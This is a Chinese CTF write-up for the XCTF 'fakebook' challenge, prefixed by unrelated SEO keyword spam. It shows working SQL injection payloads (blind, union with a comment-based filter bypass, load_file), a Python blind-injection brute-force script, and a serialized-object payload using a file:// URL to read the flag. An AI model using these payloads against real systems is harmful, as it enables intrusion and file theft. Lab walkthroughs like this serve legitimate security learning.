珠海网站建设制作郑州市城乡建设局证书查询
张小明 2026/1/15 10:42:55
珠海网站建设制作,郑州市城乡建设局证书查询,百度云网站建设视频,网络设计是不是艺术类题目#xff1a;攻防世界#xff1a;fakebook #xff08;sql注入#xff09;
提示#xff1a;sql注入步骤
进入网站查看下功能点#xff0c;一个登录一个加入。加入一个注册后自动返回首页#xff0c;显示出了刚刚注册的用户信息#xff0c;并且可以点开。这是点开后的…题目攻防世界fakebook sql注入提示sql注入步骤进入网站查看下功能点一个登录一个加入。加入一个注册后自动返回首页显示出了刚刚注册的用户信息并且可以点开。这是点开后的展示页面针对上面对注册和登录点进行抓包然后尝试注入login和join页面似乎不存在注入不过在view展示页面似乎存在盲注payload?no1 and 11 / and 12这里记录一下爆出了网站目录/var/www/html扫描网站看一下下载user.php.bak看下?phpclassUserInfo{public $name;public $age0;public $blog;public function__construct($name,$age,$blog){$this-name$name;$this-age(int)$age;$this-blog$blog;}functionget($url){$chcurl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);$outputcurl_exec($ch);$httpCodecurl_getinfo($ch,CURLINFO_HTTP_CODE);if($httpCode404){return404;}curl_close($ch);return$output;}public function getBlogContents(){return$this-get($this-blog);}public function isValidBlog(){$blog$this-blog;returnpreg_match(/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]\.)[a-zA-Z]{2,6}(\:[0-9])?(\/\S*)?$/i,$blog);}}发现是一个用户类有些方法和blog的效验。returnpreg_match(/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]\.)[a-zA-Z]{2,6}(\:[0-9])?(\/\S*)?$/i,$blog);只允许http或https开头符合域名形式的地址输入在join页面的时候调用了此方法进行校验。如果可以绕过应该可以利用上面的curl进行file://、gopher://等读文件…尝试了下没法利用。那还是回到sql注入。没看到扫描目录中存在flag.php的时候还在死板的进行sql注入拿数据库名、表名、列名…数据库view.php?no1ANDASCII(SUBSTR((DATABASE()),1,1))1表名view.php?no1and(SELECT table_name FROM information_schema.tables WHERE table_schemaDATABASE()LIMIT0,1)后面测试了半天发现数据库名为fakebook只有一个表users。回到flag.php根据之前报错的目录拼接出 地址/var/www/html/flag.php用load_file依次读出内容。后面直接用ai生成一个脚本爆破出flag.php的内容#!/usr/bin/env python3importasyncio,aiohttp URLhttp://61.147.171.105:53869/view.phpFILE/var/www/html/flag.phpLEN70TOKxxx# 正常页面关键字 CONC3TIME30asyncdefreq(payload:str)-bool:asyncwithsemaphore:asyncwithsession.get(URL,params{no:f1 and {payload}},timeoutTIME)asr:returnTOKinawaitr.text()asyncdefget_char(pos:int)-str:v0forbitinrange(7):#0-127只需7位 payloadfORD(MID(LOAD_FILE({FILE}),{pos},1)){1bit}ifawaitreq(payload):v|1bitreturnchr(v)asyncdefmain():global semaphore,session semaphoreasyncio.Semaphore(CONC)asyncwithaiohttp.ClientSession(connectoraiohttp.TCPConnector(limitCONC))assession:flagawaitasyncio.gather(*(get_char(i)foriinrange(1,LEN1)))print(.join(flag))if__name____main__:asyncio.run(main())补充一下其他方法上面view.php?no1 注入时测试?no -1 union select 1,2,3,4–联合注入 发现有过滤了 union select可以绕过union//select**继续 ?no -1 union//select 1,2,3,4– 爆出2回显位?no-1 union//select 1,user(),3,4–//数据库信息其实通过联合查询可以直接查出flag.php内容?no-1union/**/select1,load_file(/var/www/html/flag.php),3,4--另外一种继续爆破数据库然后爆字段名?no-1union/**/select1,group_concat(column_name),3,4from information_schema.columns where table_nameusers--发现data字段读一个看看似乎和之前下载的备份 user.php.bak 中用户类有关系看起来像序列化之后的内容。直接改动 123.blog 为file:///var/www/html/flag.phpO:8:UserInfo:3:{s:4:name;s:5:admin;s:3:age;i:19;s:4:blog;s:29:file:///var/www/html/flag.php;}payload:?no-1union/**/select1,2,3,O:8:UserInfo:3:{s:4:name;s:5:admin;s:3:age;i:19;s:4:blog;s:29:file:///var/www/html/flag.php;}查看源码发现iframe框架中有base64的加密内容base64解密得到flag